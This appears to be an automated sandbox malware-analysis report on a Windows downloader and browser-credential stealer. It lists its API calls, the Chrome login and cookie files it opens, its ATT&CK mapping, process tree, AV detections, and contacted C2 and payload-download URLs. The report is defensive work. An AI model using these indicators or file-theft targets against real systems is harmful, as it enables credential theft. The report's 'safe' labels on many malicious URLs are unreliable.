Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: _strlen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoW,WideCharToMultiByte,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: _strlen,_strlen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoA,MultiByteToWideChar,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,_strcat,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: _strlen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoA,_xtoa_s@20,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\SibClr.dll VolumeInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E674FB1 GetSystemTimeAsFileTime,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E677DBD _free,GetTimeZoneInformation,_free,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E6294C0 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,FreeLibrary,CorBindToRuntimeEx,FreeLibrary,FreeLibrary,FreeLibrary,

Mitre Att&ck Matrix

(Numbers in parentheses are the count of matched signatures mapped to that technique in this report.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Replication Through Removable Media (1) | Native API (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (11) | OS Credential Dumping (1) | System Time Discovery (12) | Replication Through Removable Media (1) | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
Default Accounts | Command and Scripting Interpreter (3) | Create Account (1) | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (11) | Peripheral Device Discovery (11) | Remote Desktop Protocol | Man in the Browser (1) | Exfiltration Over Bluetooth | Encrypted Channel (22) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Browser Extensions (1) | Process Injection (12) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Data from Local System (1) | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Bootkit (1) | Logon Script (Mac) | Install Root Certificate (2) | NTDS | System Information Discovery (58) | Distributed Component Object Model | Input Capture (11) | Scheduled Transfer | Application Layer Protocol (14) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing (13) | LSA Secrets | Query Registry (2) | SSH | Clipboard Data (1) | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Timestomp (1) | Cached Domain Credentials | Security Software Discovery (471) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | Virtualization/Sandbox Evasion (14) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading (2) | Proc Filesystem | Process Discovery (3) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion (14) | /etc/passwd and /etc/shadow | Remote System Discovery (11) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation (1) | Network Sniffing | System Network Configuration Discovery (2) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Process Injection (12) | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Bootkit (1) | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

Behavior Graph

[Behavior graph rendered as an image in the original report; only the node text recoverable from the page is kept below.]

Behavior Graph ID: 327203 | Sample: h1GodtbhC8.exe | Startdate: 05/12/2020 | Architecture: WINDOWS | Score: 100
Start node, DNS/IP: dream.pics; www.sodown.xyz; 30 other IPs or domains
Start node, signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 14 other signatures

Process tree recovered from the graph:
  h1GodtbhC8.exe (started)
    dropped: C:\Users\user\AppData\Local\...\Sibuia.dll (PE32); C:\Users\user\AppData\...\h1GodtbhC8.exe.log (ASCII); C:\Users\user\AppData\Local\...\SibClr.dll (PE32); 2 other files (none is malicious)
    setup.exe (started)
      dropped: C:\Program Files (x86)\...\aliens.exe (PE32)
      aliens.exe (started)
        DNS/IP: EF6DF4AF06BA6896.xyz 104.28.4.129 (ports 49734, 49738, 49740; CLOUDFLARENETUS, United States); ef6df4af06ba6896.xyz
        dropped: C:\Users\user\...\1E1C360C582DF797.exe (PE32)
        signatures: Installs new ROOT certificates; Hides threads from debuggers
        1E1C360C582DF797.exe (started)
          DNS/IP: 1c5491a87d65f1ef.club 172.67.142.39 (ports 443, 49739; CLOUDFLARENETUS, United States); 192.168.2.1 (unknown); 2 other IPs or domains
          signatures: Detected unpacking (creates a PE file in dynamic memory); Machine Learning detection for dropped file; Tries to harvest and steal browser information (history, passwords, etc); Contains functionality to detect sleep reduction / modifications
          1607186572092.exe (started)
          1607186588295.exe (started)
          ThunderFW.exe (started)
        cmd.exe (started)
          DNS/IP: 127.0.0.1 (unknown)
          signatures: Uses ping.exe to sleep
          conhost.exe (started)
          PING.EXE (started)
        1E1C360C582DF797.exe (started)
          DNS/IP: ef6df4af06ba6896.xyz
          cmd.exe (started)
            conhost.exe (started)
        msiexec.exe (started)
  msiexec.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
h1GodtbhC8.exe | 46% | Virustotal |
h1GodtbhC8.exe | 19% | Metadefender |
h1GodtbhC8.exe | 64% | ReversingLabs | Win32.Downloader.Upatre
h1GodtbhC8.exe | 100% | Avira | HEUR/AGEN.1139239
h1GodtbhC8.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\71eza90awf48\aliens.exe | 100% | Joe Sandbox ML |
C:\ProgramData\sib\{7C999AAA-0000-487E-97BD-7619B45532F4}\SibClr.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsqEF29.tmp\Sibuia.dll | 17% | ReversingLabs | Win32.PUA.SilentInstallBuilder

Unpacked PE Files

Source | Detection | Scanner | Label
25.2.1E1C360C582DF797.exe.4330000.4.unpack | 100% | Avira | TR/Patched.Ren.Gen2
0.0.h1GodtbhC8.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1139321
21.2.1E1C360C582DF797.exe.42a0000.6.unpack | 100% | Avira | TR/Patched.Ren.Gen2
4.2.aliens.exe.42c0000.4.unpack | 100% | Avira | TR/Patched.Ren.Gen2
0.2.h1GodtbhC8.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1139321

Domains

Source | Detection | Scanner | Label
ef6df4af06ba6896.xyz | 5% | Virustotal |
dream.pics | 10% | Virustotal |
EF6DF4AF06BA6896.xyz | 5% | Virustotal |

URLs

Source | Detection | Scanner | Label
https://1C5491A87D65F1EF.club/Info_t/upycfa | 0% | Avira URL Cloud | safe
https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info. | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://EF6DF4AF06BA6896.xyz/info/du | 0% | Avira URL Cloud | safe
http://dream.pics/setup_10.2_mix1.exe/silentHKEY_CURRENT_USERSoftware | 0% | Avira URL Cloud | safe
http://EF6DF4AF06BA6896.xyz/0 | 0% | Avira URL Cloud | safe
http://ef6df4af06ba6896.xyz/info/w | 0% | Avira URL Cloud | safe
http://EF6DF4AF06BA6896.xyz// | 0% | Avira URL Cloud | safe
http://dream.pics/setup_10.2_mix1.exe | 0% | Avira URL Cloud | safe
https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_ | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe
http://EF6DF4AF06BA6896.xyz/; | 0% | Avira URL Cloud | safe
https://1C5491A87D65F1EF.club/Info_t/upData | 0% | Avira URL Cloud | safe
https://twitter.comsec-fetch-dest: | 0% | Avira URL Cloud | safe
https://www.instagram.comsec-fetch-mode: | 0% | Avira URL Cloud | safe
http://ef6df4af06ba6896.xyz/info/du: | 0% | Avira URL Cloud | safe
http://EF6DF4AF06BA6896.xyz/info/wlub | 0% | Avira URL Cloud | safe
http://dream.pics/setup_10.2_mix1.exeimet | 0% | Avira URL Cloud | safe
http://www.youtube.com_7 | 0% | Avira URL Cloud | safe
https://twitter.comReferer: | 0% | Avira URL Cloud | safe
http://www.interestvideo.com/video1.php | 0% | Avira URL Cloud | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
https://sectigo.com/CPS0D | 0% | URL Reputation | safe
http://dream.pics/setup_10.2_mix1.exe6b_x | 0% | Avira URL Cloud | safe
http://ef6df4af06ba6896.xyz/ | 0% | Avira URL Cloud | safe
https://.twitter.com/s | 0% | Avira URL Cloud | safe
http://ef6df4af06ba6896.xyz/info/du. | 0% | Avira URL Cloud | safe
http://crt.com | 0% | Avira URL Cloud | safe
http://EF6DF4AF06BA6896.xyz/info/ddd | 0% | Avira URL Cloud | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://EF6DF4AF06BA6896.xyz/dbo | 0% | Avira URL Cloud | safe
http://www.sodown.xyz/index.exe | 100% | Avira URL Cloud | malware
https://1C5491A87D65F1EF.club/ | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
http://ef6df4af06ba6896.xyz/info/g | 0% | Avira URL Cloud | safe
http://ef6df4af06ba6896.xyz/info/e | 0% | Avira URL Cloud | safe
http://EF6DF4AF06BA6896.xyz/info/r | 0% | Avira URL Cloud | safe
https://1C5491A87D65F1EF.club/Info_t/up | 0% | Avira URL Cloud | safe
http://crl.usertrust. | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
http://EF6DF4AF06BA6896.xyz/info/dddi_u | 0% | Avira URL Cloud | safe
http://ocsp.usertrus | 0% | Avira URL Cloud | safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: | 0% | Avira URL Cloud | safe
http://www.sodown.xyz/in | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ef6df4af06ba6896.xyz | 104.28.4.129 | true | false | | unknown
cnchubstat.sandai.net | 140.206.225.136 | true | false | | high
bgphub5u.sandai.net | 39.98.57.143 | true | false | | high
iplogger.org | 88.99.66.31 | true | false | | high
dream.pics | 8.208.85.95 | true | true | | unknown
bgphub5pr.sandai.net | 47.92.39.6 | true | false | | high
EF6DF4AF06BA6896.xyz | 104.28.4.129 | true | false | | unknown
1c5491a87d65f1ef.club | 172.67.142.39 | true | false | | unknown
cnc.hub5pnc.sandai.net | 47.92.99.221 | true | false | | high
www.sodown.xyz | 104.18.63.67 | true | false | | unknown
cnc.hub5pn.sandai.net | 153.3.232.174 | true | false | | high
cncidx.m.hub.sandai.net | 112.64.218.64 | true | false | | high
pmap.sandai.net | 47.97.7.140 | true | false | | high
hub5c.hz.sandai.net | unknown | unknown | false | | high
hub5idx.shub.hz.sandai.net | unknown | unknown | false | | high
hub5u.hz.sandai.net | unknown | unknown | false | | high
hub5sr.shub.hz.sandai.net | unknown | unknown | false | | high
score.phub.hz.sandai.net | unknown | unknown | false | | high
hubstat.hz.sandai.net | unknown | unknown | false | | high
pmap.hz.sandai.net | unknown | unknown | false | | high
hub5pr.hz.sandai.net | unknown | unknown | false | | high
hub5pn.hz.sandai.net | unknown | unknown | false | | high
imhub5pr.hz.sandai.net | unknown | unknown | false | | high
hub5pnc.hz.sandai.net | unknown | unknown | false | | high
relay.phub.hz.sandai.net | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://ef6df4af06ba6896.xyz/info/w | false | Avira URL Cloud: safe | unknown
http://EF6DF4AF06BA6896.xyz/info/ddd | false | Avira URL Cloud: safe | unknown
http://ef6df4af06ba6896.xyz/info/du | false | | unknown
http://ef6df4af06ba6896.xyz/info/g | false | Avira URL Cloud: safe | unknown
http://ef6df4af06ba6896.xyz/info/e | false | Avira URL Cloud: safe | unknown
http://ef6df4af06ba6896.xyz/info/r | false | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://1C5491A87D65F1EF.club/Info_t/upycfa | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | false | | high
https://01%s08%s15%s22%sWebGL%d%02d%s.club/http://01%s08%s15%s22%sFrankLin%d%02d%s.xyz/post_info. | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://duckduckgo.com/ac/?q= | 1E1C360C582DF797.exe, 00000015.00000003.572387454.000000000256C000.00000004.00000001.sdmp | false | | high
http://ocsp.sectigo.com0 | h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr | false | URL Reputation: safe (x3) | unknown
http://EF6DF4AF06BA6896.xyz/info/du | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://www.messenger.com/ | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept: | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
http://dream.pics/setup_10.2_mix1.exe/silentHKEY_CURRENT_USERSoftware | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | true | Avira URL Cloud: safe | unknown
http://EF6DF4AF06BA6896.xyz/0 | 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://EF6DF4AF06BA6896.xyz// | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | 1607186572092.exe, 0000001C.00000002.546643482.0000000000198000.00000004.00000010.sdmp, 1607186588295.exe, 0000001D.00000002.580802111.0000000000198000.00000004.00000010.sdmp | false | | high
http://EF6DF4AF06BA6896.xyz/info/w | 1E1C360C582DF797.exe, 00000015.00000003.574995047.0000000005D4C000.00000004.00000001.sdmp | false | | unknown
http://dream.pics/setup_10.2_mix1.exe | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000003.655265366.00000000026C0000.00000040.00000001.sdmp | true | Avira URL Cloud: safe | unknown
https://apreltech.com/SilentInstallBuilder/Doc/&t=event&ec=%s&ea=%s&el=_ | h1GodtbhC8.exe, 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp, Sibuia.dll.0.dr | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_Error... | aliens.exe, 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000015.00000002.825159947.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe, 00000019.00000000.617074635.0000000000409000.00000002.00020000.sdmp, 1E1C360C582DF797.exe.4.dr | false | | high
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr | false | URL Reputation: safe (x3) | unknown
http://EF6DF4AF06BA6896.xyz/; | 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://twitter.com/ookie: | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://curl.haxx.se/docs/http-cookies.html | 1E1C360C582DF797.exe, 00000015.00000002.831435598.0000000004FD1000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.656349419.0000000005230000.00000004.00000001.sdmp | false | | high
https://1C5491A87D65F1EF.club/Info_t/upData | 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://twitter.comsec-fetch-dest: | 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://iplogger.org/14Zhe7 | 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp | false | | high
https://www.instagram.comsec-fetch-mode: | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.instagram.com/accounts/login/ajax/facebook/ | 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
http://ef6df4af06ba6896.xyz/info/du: | 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://www.instagram.com/sec-fetch-site: | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
http://EF6DF4AF06BA6896.xyz/info/wlub | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
http://dream.pics/setup_10.2_mix1.exeimet | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | true | Avira URL Cloud: safe | unknown
http://www.youtube.com_7 | 1E1C360C582DF797.exe, 00000019.00000003.642482203.0000000005C32000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://twitter.comReferer: | 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.interestvideo.com/video1.php | 1E1C360C582DF797.exe, 00000019.00000002.656349419.0000000005230000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0D | h1GodtbhC8.exe, 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp, Sibuia.dll.0.dr | false | URL Reputation: safe (x3) | unknown
http://dream.pics/setup_10.2_mix1.exe6b_x | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | true | Avira URL Cloud: safe | unknown
http://ef6df4af06ba6896.xyz/ | 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://www.messenger.com | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://www.instagram.com/accept: | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://.twitter.com/s | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | low
https://www.messenger.com/login/nonce/ | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
http://www.nirsoft.net/ | 1607186572092.exe, 0000001C.00000002.546755980.000000000040F000.00000002.00020000.sdmp, 1607186588295.exe, 0000001D.00000002.580846767.000000000040F000.00000002.00020000.sdmp | false | | high
http://ef6df4af06ba6896.xyz/info/du. | 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.com | 1E1C360C582DF797.exe, 00000015.00000003.582940046.0000000005D48000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B% | 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://sectigo.com/CPS0 | h1GodtbhC8.exe | false | URL Reputation: safe (x3) | unknown
https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id= | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
http://www.youtube.com | 1E1C360C582DF797.exe | false | | high
https://twitter.com/compose/tweetsec-fetch-dest: | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://www.instagram.com/ | 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
http://EF6DF4AF06BA6896.xyz/dbo | 1E1C360C582DF797.exe, 00000015.00000002.826367986.0000000002553000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
http://www.sodown.xyz/index.exe | 1E1C360C582DF797.exe, 00000015.00000002.827073062.0000000004157000.00000004.00000040.sdmp, 1E1C360C582DF797.exe, 00000015.00000003.655265366.00000000026C0000.00000040.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking | 1E1C360C582DF797.exe, 00000015.00000002.831553444.000000000502E000.00000002.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
https://www.messenger.com/origin: | 1E1C360C582DF797.exe, 00000019.00000002.657198180.00000000053FE000.00000004.00000001.sdmp | false | | high
